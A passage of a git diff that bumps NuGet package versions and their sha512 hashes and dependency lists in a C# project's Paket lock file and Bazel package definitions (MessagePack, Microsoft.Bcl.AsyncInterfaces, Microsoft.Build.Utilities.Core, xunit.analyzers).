Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - System.Text.Encoding.CodePages (7.0) - System.Threading.Channels (7.0) + System.Text.Encoding.CodePages (9.0) + System.Threading.Channels (9.0) System.Threading.Tasks (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - System.Threading.Tasks.Extensions (4.5.4) + System.Threading.Tasks.Extensions (4.6) System.Threading.ThreadPool (4.3) System.Runtime (>= 4.3) System.Runtime.Handles (>= 4.3) 
@@ -197,7 +195,7 @@ NUGET xunit.assert (>= 2.9.2) xunit.core (2.9.2) xunit.abstractions (2.0.3) - xunit.analyzers (1.16) + xunit.analyzers (1.17) xunit.assert (2.9.2) xunit.core (2.9.2) xunit.extensibility.core (2.9.2) diff --git a/csharp/paket.main.bzl b/csharp/paket.main.bzl index 413bf68ddf3..fa79062ab44 100644 --- a/csharp/paket.main.bzl +++ b/csharp/paket.main.bzl 
@@ -9,14 +9,14 @@ def main(): packages = [ {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.9.3", "sha512": "sha512-hgu/4KttHz9bXOISmomz1uO4WidkXqBbSu4MjVgj3SeJ/bH4t+nkZ5qybpqpZJHf04hdXlyt/ux0OWv5/xEKRQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", 
"Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp2.2": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netcoreapp3.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": 
["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "netstandard2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Humanizer.Core", "id": "Humanizer.Core", "version": "2.14.1", "sha512": "sha512-yzqGU/HKNLZ9Uvr6kvSc3wYV/S5O/IvklIUW5WF7MuivGLY8wS5IZnLPkt7D1KW8Et2Enl0I3Lzg2vGWM24Xsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack", "id": "MessagePack", "version": "2.5.187", "sha512": "sha512-gZ6QLyipngHr+n/XWWm7TM26j9vkM6+B6RXBuv+ia/DjJsG6pJaQbVuz/+RBFJrSd98eTk+CqHwrE1DtFyR1bw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", 
"System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net7.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net8.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", 
"System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "2.5.187", "sha512": "sha512-1IThHnbMw6Ah9Mb/bZfWEwZDo3ZbsU9usGAOeCs/oPWsklrdxVDNZHjIg6myvjlQvL7oMhagEeb+07kjL410aQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": 
[], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Bcl.AsyncInterfaces", "id": "Microsoft.Bcl.AsyncInterfaces", "version": "8.0.0", "sha512": "sha512-ecsHc9lEZZJM7k5HHZA1PV2N+ELEarLFcssV2bn7XQIJoaiNZDkplTNcX+VKANfDGURAuEyVFCcRu7aFy16VUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack", "id": "MessagePack", "version": "2.5.192", "sha512": "sha512-SnrwSQIKWfxcQvzE1TCUPvJ7A/44KFBDcmCc+YUDIq8QalCf0bGAjiBoAFewhJ81QuS5FsCNCOcKn+IURYlbAQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": 
[], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net7.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net8.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], 
"netcoreapp1.1": [], "netcoreapp2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "2.5.192", 
"sha512": "sha512-pE/SD2N0+nDAU8BtTHqjyIhLM2L5Mb0NiO4hW0ybiv2I+BbK0JEaGtbKpeEmOvKT+5s2hds0gvk/GrAHhgcpdw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Bcl.AsyncInterfaces", "id": "Microsoft.Bcl.AsyncInterfaces", "version": "9.0.0", "sha512": "sha512-bYp2ksSR5uB6xqOa4NyD2gBOeFrc2n8FAWoh781MNMDcPjk1ysD7DNpv7r7sQOXfdFJT6F/syX7fN4lmUsn+RQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], 
"netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Build", "id": "Microsoft.Build", "version": "17.12.6", "sha512": "sha512-YEiL5xKowbwnr52YroALNHg8YurjLyFTlhv3USrswhubuxN2ldY1TmQpBKQ4K28UgWJV9BxTVXY9/CecMNDeOA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Build.Framework", "id": "Microsoft.Build.Framework", "version": 
"17.12.6", "sha512": "sha512-UjfxnrQN9BPVtO0Kvv2FB5dpN2CX5snc7coq5vVQdbCV6kdSpI/r+GZTLvU/5BTT8y8bvIUqoocxRR674N6bWg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.Build.Utilities.Core", "id": "Microsoft.Build.Utilities.Core", "version": "17.5.0", "sha512": 
"sha512-La1NFQ7SVz1pVGEUnG15BQG26jJkRMCiitySBXLhuTYf9IG6eZ5j5UFjnM4EFKSVKbictRv+D/F0dQtsCiK9ag==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net462": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net47": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net471": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net9.0": 
["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Build.Utilities.Core", "id": "Microsoft.Build.Utilities.Core", "version": "17.12.6", "sha512": "sha512-YPtNsiLEPn3g3EcO+Kyr7fIdufg6wdzibzufclQYZjIDS80krFsYi2rTpeTmHtlCK0PhyLvxJAQZ3NecgJHTkg==", "sources": ["https://api.nuget.org/v3/index.json"], 
"dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], 
